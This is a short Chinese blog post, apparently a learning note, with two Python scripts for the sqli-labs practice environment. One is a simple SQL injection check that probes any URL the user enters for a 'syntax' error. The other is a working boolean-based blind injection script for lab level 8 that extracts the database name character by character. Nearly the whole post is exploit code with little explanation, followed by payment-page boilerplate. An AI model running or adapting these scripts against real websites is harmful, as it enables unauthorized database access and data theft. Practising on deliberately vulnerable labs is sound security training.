sql注入脚本1

sqllab第一关验证poc

import requests
import re
url = input("输入你的url:")
r = requests.get(url)
res = str(r.content)
if re.search("syntax",res):
    print("存在sql注入")
else:
    print("不存在")

sql第八关查数据库

import requests
import string
url = "http://127.0.0.2:8087/Less-8/"
normalTextLen = len(requests.get(url+"?id=1").text)
# print("normal Text Length: " + str(normalTextLen))
dbNameLen = 0
while True:
    dbNameLen_url = url + "?id=1'+and+length(database())=" + str(dbNameLen) + "--+"
    # print(dbNameLen_url)
    if len(requests.get(dbNameLen_url).text) == normalTextLen:
        # print("db Name Length: " + str(dbNameLen))
        break
    if dbNameLen == 30:
        print("Error!")
        break

    dbNameLen += 1
dbName = ""
for i in range(1,dbNameLen+1):
    for a in string.ascii_lowercase:
        dbName_url = url + "?id=1'+and+substr(database()," + str(i) +",1)='"+ a +"'--+"
        # print(dbName_url)
        if len(requests.get(dbName_url).text) == normalTextLen:
            dbName+=a
            print(dbName)
            break
# print(dbName)
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值